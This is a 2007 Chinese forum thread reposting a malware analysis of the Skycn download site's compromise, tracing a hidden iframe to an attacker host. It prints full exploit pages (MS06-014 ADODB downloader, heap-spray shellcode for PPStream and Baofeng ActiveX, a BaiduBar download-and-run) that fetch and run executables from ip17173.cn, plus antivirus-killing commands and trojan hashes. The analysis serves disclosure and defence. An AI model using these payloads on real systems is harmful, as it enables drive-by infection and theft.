诚毅小家|集美大学生活【集美大学,诚毅学院,水产学院,师范学院,美术学院,财经学院,体育学院,航海学院,集美学村,石鼓路,龙舟池】

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
查看: 396|回复: 2

天空软件站被挂马的幕后及Monyer的分析

[复制链接]
发表于 2007-10-7 16:16:38 | 显示全部楼层 |阅读模式
    天空软件站是中国最大的软件下载站之一,如今它被挂马了,那么想必已经有几千万人中招了。Monyer并不是危言耸听,下面的分析将证明这不是个笑话。2 y' k" k5 o1 _+ X
    今天偶尔上天空看我的UDisk时(重要提醒,天空有病毒不要打开,晕了!),发现Maxthon居然弹出程序运行警告,提示我在c盘下有个c.exe文件要运行,不知道其他人遇到这种情况怎么想,反正从我电脑上出现便成了一件恐怖的事情。看了看任务管理器,内存已经增加了几百兆,很显然被溢出了。再看看C盘的根目录,一个c.exe文件正躺在那里(这说明病毒文件还没有运行,如果运行了,估计你就什么都看不到了。)。于是便开始了以下寻马之旅。
- Q/ x, E" x8 v0 h' h- d; L! k0 P9 l9 w5 q  _, g
   通过对天空站的分析,被挂马的页面仅存在于软件下载页面。再通过对加进的javascript和iframe的排除,最后落定被插入的恶意代码为:  @  [: M2 A4 q& |$ S
<iframe name=import_frame width=1height=1 src=http://iplog.skycn.com/wherefrom.php?id=32336frameborder=no></iframe>1 ^4 W5 H) z8 f. \* _4 \8 ?
它将框架的宽高设为1像素即肉眼不可见。下载whereform.php文件发现里面有另外的代码:) P- V3 W' A. g3 D* x
<iframe src=http://www.ip17173.cn/index.html?419891509 width=100 height=0></iframe>+ a) s5 R* g& y  ?+ m7 J# K
又一个框架,直接访问将看到两个计数器,挺有意思
* X! {7 X* P- w% v7 d$ B  @* E
. d" N5 b: P6 `/ D5 @5 Y  继续下载ip17173.cn这个站点上的index.html文件打开,里面是一堆加密的javascript代码,这是件好事情——小偷偷东西通常都把脸蒙起来。
8 f' W* A6 X6 D6 h. U简单看了一下,虽然js被加密得面目全非,但好在解密函数还在,那么一切都变得简单,将document.write换成alert即可。运行一下index.html,弹出第二个alert窗口便是木马的所在了
  l1 m9 J5 N6 n+ t, J+ G
个iframe框架,看来应该对应9个不同的木马哦。用flashget一齐下载,发现有效的仅是vip1.htm~vip4.htm这四个页面,估计剩下的是预留出来的吧。2 V5 Z5 G+ j! F! _
对这四个页面依次做代码分析便有些冒冷汗了。以下是分析结果
& `# F: H0 S& g) V
; S. z' X) s+ \3 R4 G9 M  S
http://www.ip17173.cn/vip1.htm     MS-06014     down.exe     c:\1.exe. M4 d! O( h% A! t+ O) m5 n0 J" g
<script>url2="http://www.ip17173.cn/down.exe";url1="http://www.ip17173.cn/run.js";try{varado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");varxml=ado.CreateObject("Microsoft.XML"+"HTTP","");varas=ado.createobject("Adodb.Stream","");xml.Open("GET",url1,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path1="..//ntuser.js";as.savetofile(path1,2);as.close();xml.Open("GET",url2,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path2="C:\\1.exe";as.savetofile(path2,2);as.close();varshell=ado.createobject("Shell.Application","");shell.shellExecute(path1,"","","open",0);}catch(e){};</script><body>查无此页<html> ! L) i: B9 ]2 L2 u% }# f' g* e
http://www.ip17173.cn/vip2.htm     ppstream    down.exe     c:\c.exe
. V7 z: {  s5 F; }<html><body><objectid="pingfan"classid="clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458"></object><script>varshellcode=unescape("%u00E8%u0000%u6A00%uEB03%u7E21%uE2D8%u9873%u8AFE%u8E0E%u0E4E%u55EC%u4C52%u4F4D%u004E%u3600%u2F1A%u6370%u5C3A%u2E63%u7865%u0065%u5F59%u67AF%uA164%u0030%u408B%u8B0C%u1C70%u8BAD%u0868%u8B51%u3C75%u748B%u782E%uF503%u8B56%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E%uDD03%u8B66%u4B0C%u5E8B%u031C%u8BDD%u8B04%uC503%u59AB%uBCE2%u0F8B%uF980%u7463%u570A%uD0FF%uAF95%u6AAF%uEB01%u52AC%u5752%u8F8D%u10DB%u0040%uE981%u104E%u0040%u5251%uD0FF%u016A%uFF57%uEC57%u57FF%u90E8%u7468%u7074%u2F3A%u772F%u7777%u692E%u3170%u3137%u3337%u632E%u2F6E%u6F64%u6E77%u652E%u6578");bigblock=unescape("%u9090");headersize= 20;slackspace = headersize+shellcode.length;while ( bigblock.length< slackspace ) bigblock+=bigblock;fillblock = bigblock.substring(0,slackspace);block=bigblock.substring(0, bigblock.length-slackspace);while(block.length+ slackspace < 0x40000) block =block+ block + fillblock;memory =new Array();;;;memory;for (x=0; x<400;x++) memory[x] = block +shellcode;var buffer ='\x0a';while(buffer.length < 500) buffer+='\x0a\x0a\x0a\x0a';pingfan.Logo=buffer;</script></body></html>- l4 P- g4 n4 u& \& N
http://www.ip17173.cn/vip3.htm     暴风      down.exe     c:\u.exe
; c# p+ k5 q9 G  F! g& x2 e2 W<html>+ @: @( k! E/ Y; s+ `& c, g
<object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>
, i7 p7 T3 y) o' Y<body>
, s6 j- A1 L3 N# S1 n<SCRIPT language="javascript">
' P- z0 e; Q4 L: }varshellcode=unescape("%u9090%u9090%uEFE9%u0000%u5A00%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uD88B%u738B%u8B3C%u1E74%u0378%u8BF3%u207E%uFB03%u4E8B%u3314%u56ED%u5157%u3F8B%uFB03%uF28B%u0E6A%uF359%u74A6%u5908%u835F%u04C7%uE245%u59E9%u5E5F%uCD8B%u468B%u0324%uD1C3%u03E1%u33C1%u66C9%u088B%u468B%u031C%uC1C3%u02E1%uC103%u008B%uC303%uFA8B%uF78B%uC683%u8B0E%u6AD0%u5904%u6AE8%u0000%u8300%u0DC6%u5652%u57FF%u5AFC%uD88B%u016A%uE859%u0057%u0000%uC683%u5613%u8046%u803E%uFA75%u3680%u5E80%uEC83%u8B40%uC7DC%u6303%u646D%u4320%u4343%u6643%u03C7%u632F%u4343%u03C6%u4320%u206A%uFF53%uEC57%u04C7%u5C03%u2E61%uC765%u0344%u7804%u0065%u3300%u50C0%u5350%u5056%u57FF%u8BFC%u6ADC%u5300%u57FF%u68F0%u2451%u0040%uFF58%u33D0%uACC0%uC085%uF975%u5251%u5356%uD2FF%u595A%uE2AB%u33EE%uC3C0%u0CE8%uFFFF%u47FF%u7465%u7250%u636F%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574%u446D%u7269%u6365%u6F74%u7972%u0041%u6957%u456E%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4C00%u616F%u4C64%u6269%u6172%u7972%u0041%u7275%u6D6C%u6E6F%u5500%u4C52%u6F44%u6E77%u6F6C%u6461%u6F54%u6946%u656C%u0041%u7468%u7074%u2F3A%u772F%u7777%u692E%u3170%u3137%u3337%u632E%u2F6E%u6F64%u6E77%u652E%u6578");
/ l: S7 _. y# N, w6 ?3 b</script>: F# j' t9 z. e3 p& E9 F
<SCRIPT language="javascript">* C1 ^& n" |0 ?# c
var bigblock = unescape("%u9090%u9090");) H9 R) ?+ E* N. o3 T
var headersize = 20;" Z5 r2 k: Y9 z" c
var slackspace = headersize+shellcode.length;
+ F5 Q" ~' N0 l* b% ~, g, \while (bigblock.length<slackspace) bigblock+=bigblock;
+ ]1 y8 p2 y" }7 ^5 L- q% Z+ Gfillblock = bigblock.substring(0, slackspace);6 J0 h7 L! X: E$ K, C$ L
block = bigblock.substring(0, bigblock.length-slackspace);
6 ^  w8 d2 u! A* c/ S+ Ywhile(block.length+slackspace<0x40000) block = block+block+fillblock;
6 C' N9 y$ h5 t( Gmemory = new Array();
8 @# Z1 v' G; b! o! L* C2 Q1 H# lfor (x=0; x<300; x++) memory[x] = block + shellcode;
1 Q# c! N' L  C4 x/ ?# ^var buffer = '';' ?) L9 O0 E6 }; G) P
while (buffer.length < 4057) buffer+='\x0a\x0a\x0a\x0a';& ^3 V! s- x* B3 I3 D
buffer+='\x0a';
; \) f) f$ b* h- }6 d+ E( S3 gbuffer+='\x0a';% u5 t5 n) \1 k( e, N
buffer+='\x0a';9 w" U$ R( v- l) ~! `  Q$ L: p  ~
buffer+='\x0a\x0a\x0a\x0a';! ^6 X( z0 k1 ]2 m- M" D
buffer+='\x0a\x0a\x0a\x0a';
9 l& ~# n9 a3 \0 s, k- W% e1 Utarget.rawParse(buffer);
. e9 |# Y) [) @' n$ e$ C( a</script>
# e! U6 H) f/ s4 ?0 l8 q+ ?* d</body>, L& O' l4 Z2 t% o- M
</html>

4 D' T2 I# C  D0 G% t3 g0 |http://www.ip17173.cn/vip4.htm     BaiDuBar      calc.cab       down.exe
% d1 k0 l, x  d2 C+ j4 F' ]<script>) P3 R# K. M4 h' ]) c3 D
function DowndloadCalcAndRun()" n' s8 K6 K% U& q/ N! c
{, Q  c, Y0 V+ M. `" X( B; _
com.DloadDS("
http://www.ip17173.cn/calc.cab", "down.exe", 00);+ e! k$ x2 q4 }2 ^  b; N" Q/ T
}
- u' }2 L$ e4 ~$ s9 Z* q+ [</script>
5 t: C, }" F9 b5 c% q</head>
1 y2 b/ k& I3 z/ e0 K" s4 v<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}">
, Y$ }4 e2 H& z) V</OBJECT>
0 q/ F) }6 l& b<script>
6 p; k" _8 R4 f( P* p+ e! ~/ {DowndloadCalcAndRun()" k# U8 T7 [: c6 g$ d7 h
</script>  f. }6 @0 W* v9 c; f! S; i$ M' `( A6 [
<body>欢迎使用<html>
5 l- r7 E# d) e/ r! Y' B
4个溢出漏洞,在前几天还有3个是0day!* S3 }7 o- {9 J2 ?
一个是ms-06014漏洞,会将其站点的down.exe文件保存到c:\1.exe并运行/ p' r- g. j2 F/ e/ @& y
一个是ppstream堆栈溢出,将同样文件保存到c:\c.exe并运行0 P' T& H* J9 \7 J+ s  M8 d1 s
一个是暴风影音溢出漏洞,保存到c:\u.exe并运行2 z( l) m0 u* m
一个是baidubar的溢出漏洞,将calc.cab 保存到down.exe并运行
: P* l6 g2 O7 }% ^. V(这些文件运行后会自我删除,然后关闭杀毒软件,并自动下载其他木马或病毒。)
' Q8 c) u8 z8 u7 E& K) s2 [其中ppstream直到如今仍没有官方补丁。
. }$ k) n1 ^1 |down.exe文件一看名便知是个下载者了,下载下来传到virscan.org不禁又汗然一把
2 {2 B5 l' d0 _2 y) F1 \2 o$ E4 ^
AVG、巴斯基、江民瑞星金山三大支柱、诺顿、趋势,全部开绿灯。即使熊猫来一个suspiciousfile,也顶多因为其是fsg2.0壳而报个可疑文件,这意味着它是不会主动删除的。麦咖啡虽然给出个pws,但也仅仅是个low的风险等级。所以几乎所有市面上常见的杀毒软件全部“罢工”。
, i/ H; @8 R) {$ f# q& Xdown.exe会下载21个文件。
- O! V8 O3 D2 }* S4 lhttp://www.ip17173.cn/down/1.exe - 20.exe、down.exe
: n8 ^1 J1 w- ?' y分别保存到C:\Program Files\Internet Explorer\1.exe - 20.exe、down.exe 运行
: E: s' T; y: W  m0 e还会执行
) N% b3 b7 u! xcmd /c taskkill /im 360safe.exe /f  z/ S: }4 d* y. s3 [
cmd /c date 2000-01-019 R7 |- B0 l: X0 Y
. t. k' m7 k0 H
然后还有一个删除自身的批处理。( M  K& w. b, b: c  m7 ]- S" r
% p6 s7 }% n! `& o3 }# x
还有其他的比如放到启动项,改名字什么的。

, W; j* l, X3 ?感谢鬼仔提供信息!
5 z; r* C- k# k
 楼主| 发表于 2007-10-7 16:17:40 | 显示全部楼层
第二次下载的16个病毒文件为(另外值得一提的是antivir小红伞对包括down.exe在内的16个病毒全部通杀,而它是款免费杀毒软件,可以与部分系统杀毒软件兼容):. U3 X. o6 b* x  ?) {# g
1.exe tr/dropper.gen
6 N7 S: X  ^5 {UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo# ^0 @! f% f7 n' y3 i* h
md5:D92BF450DA49DB121009F94E1321EDF4; _. g) n) `3 _* B; e! S
2.exe tr/dropper.gen  L+ O; m2 J7 f# h0 e. Z. p: D6 I
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
; A6 V: [, q2 X& Wmd5:E6D8CCC8AD8BBEB18652D432BF4A13BA
) s1 W1 [2 l1 L1 _" P; u$ [3.exe tr/dropper.gen
7 ^' ^4 N4 E4 g7 d% UUPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
9 m& j5 U' G- G" p8 K* M9 ]2 Lmd5:362D6904DE8D8111E1BD20BA5320E7FA
# |* b# F8 k: \4.exe tr/dropper.gen8 \! j! j' _5 T: j
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo, w; }9 z% I+ S3 d; a6 s8 _
md5:23DF9595AA8F10EB8AC850A5ACFAB791
! u8 J9 B: q4 g3 b! Y4 Q6.exe tr/dropper.gen2 U0 n; [* L, h; l, K# z: }! F
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo: L% w, M1 B4 }
md5:FEACB467E170BAD60ECB209106402228
; d( R3 \2 X4 A/ V+ S) n3 Y' K7.exe Win32.PSWTroj.OnLineGames.dz.163840. e/ q" X. x  {7 J& L
nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]/ H# `- s3 H# {6 I9 G% {2 N+ u! W
md5:7BD941FA726E9CFB30A68F7768080B04
$ m+ w  }5 N  I2 \0 p' v' ^  p4 r; ]1 `0 X8.exe tr/dropper.gen2 g( J- i4 ^  e# X
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo8 B' x* ~+ d5 w4 n, E" L
md5:BD618C1C29BC1C7CB69AEA2BA49D7C45
' |/ V  E4 Q1 z0 \3 i% ?  M9.exe suspicious file% L& r* Z5 R1 _6 Y/ j- P
Upack 0.3.9 beta2s -> Dwing9 `/ p1 i( P. T) H/ m! L
md5:6DC4A1336F4B0557EAFE3E3247F3C6FD
4 s8 ?2 n2 b: a5 o# U+ l10.exe tr/dropper.gen
3 L- O' l' s) T) @0 p2 P) R5 vMicrosoft Visual C++ v6.0 DLL *) v: N' r0 U: k5 u7 U
md5:50DF0549331035B6159DD7F2BD3947A6
& Z) C9 K) o* K7 z* [! B, }11.exe tr/dropper.gen+ }2 e" u; R' {& S3 X
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo1 Z  T1 N3 ~; n4 s  A
md5:A33527DAE1C4C541609D4FECFF63A0C93 _4 H) Z4 Z" K
13.exe tr/dropper.gen$ S/ I. \; B. ^3 V
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo- s2 ~! A6 o' }# D
md5:39CC71D365556C92EEF065169ED75148& p6 j( O1 F) K$ h+ o1 u: m
15.exe suspicious file  D$ V3 v1 U& K
Upack 0.3.9 beta2s -> Dwing [Overlay]
4 g7 R5 U, V$ _4 V6 p6 omd5:1E96067D3C6A25BFF59AD76C03C2A565% Y4 g; o! g7 O+ F0 r
16.exe suspicious file
) p2 @6 q3 A" MUpack 0.3.9 beta2s -> Dwing
! D7 [% d1 ~. l! mmd5:73E0B9D28014C84675BEF3343409EDB2
- t/ u1 f! y9 ~+ u' f17.exe Win32.PSWTroj.OnLineGames.dz.1638403 b1 w: Q7 q' D# {" u8 c7 ~
nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]
. R, v5 u( |# Z) N4 q" Dmd5:477927E9679924CEFCF8BD95DF2BA71D
" n# a* p6 z# H  n5 l2 A! m18.exe Win32.PSWTroj.OnLineGames.dz.163840
  L# x* _0 k" Q1 ^) D3 VnSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]4 y1 H- l3 V7 `0 u% D, b
md5:A2C87EE4059B2145DCA8CC7CF9692329& I3 a' [& o# G' a# f
5.exe          cannot down4 t7 U) z# e% k9 |) {
12.exe         cannot down
% a" E" c% G$ |: W8 t9 P8 \14.exe         cannot down. T2 l/ E$ a6 l5 j# d
19.exe         cannot down
% g) V5 C& R2 f  ]% l20.exe         cannot down
  ^+ {5 O0 ^* f" ]# Q针对以上四个溢出,Monyer的解决办法如下:( |  P" ~) R$ l
下载补丁修复ms06014漏洞,将baidubar和暴风升级8 g% ~% ~3 i7 Q6 S$ v4 q, V
而pps麻烦些——删除注册表的clasid:{20C2C286-BDE8-441B-B73D-AFA22D914DA5}以及{5EC7C511-CD0F-42E6-830C-1BD9882F3458}直到官方给出办法。
4 j6 p; r# ^& Y0 U7 F6 U至于天空,等官方出公告再上吧,小心湿鞋!这么大的站点被人入侵一次也不容易!
4 r; k$ N: X* c: Z4 c最后看一下该马的相关文件,挺壮观吧
+ |3 K% Y* h( t, t# R. x1 i! a
3 a' q- s. R( O2 r, u6 S' E& iMonyer!   2007-10-04 02:35
& [* |7 W9 P1 _% C4 n( ^% d; q1.jpg (90.61 KB)" E  \: V& {% Q* i& [+ j1 C
2007-10-7 15:40
% l* g, f" S% A: Q3 q) t5 |7 V  t$ \0 t/ S, X6 b% J$ I
2.jpg (6.82 KB)
( q' e. ]9 p. U  m+ x9 b" K( H* G2007-10-7 15:40) e. z8 F2 o' f' y

: a9 y4 l! j; Z& ?+ r5 [' M3.jpg (268.66 KB)
* f0 v; E3 {' h$ W: H- h2007-10-7 15:409 K* d/ [- N4 {% X8 y

7 D+ `+ F$ v8 U- ~+ n/ y4.jpg (39.38 KB)
9 k, E9 j$ ?8 r8 E! I2007-10-7 15:40
# s. f, B& @7 b
! t/ i7 A: z  o# z( }: N5.jpg (294.46 KB)
+ N/ g7 l) a# N1 K# X+ A2007-10-7 15:40/ Q0 k; j6 y8 N( A' r# x
$ y: N$ E& B3 @  F' D
6.jpg (197.03 KB)) V& w/ D  E* D" ^6 |6 B" L8 k
2007-10-7 15:40$ R+ Z2 X  h" e4 _0 R, G

: @; U3 p/ L9 M& C6 K; {2 v6 U7.jpg (47.09 KB)
7 Q8 D, c7 g! j! a" u2007-10-7 15:40
发表于 2007-10-7 16:21:41 | 显示全部楼层
看了那么多,是中木马的意思吧。早说嘛。。。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|诚毅小家 ( 小家社区工作室 闽ICP备05007965号 )

GMT+8, 2024-12-29 02:30 , Processed in 0.050134 second(s), 19 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表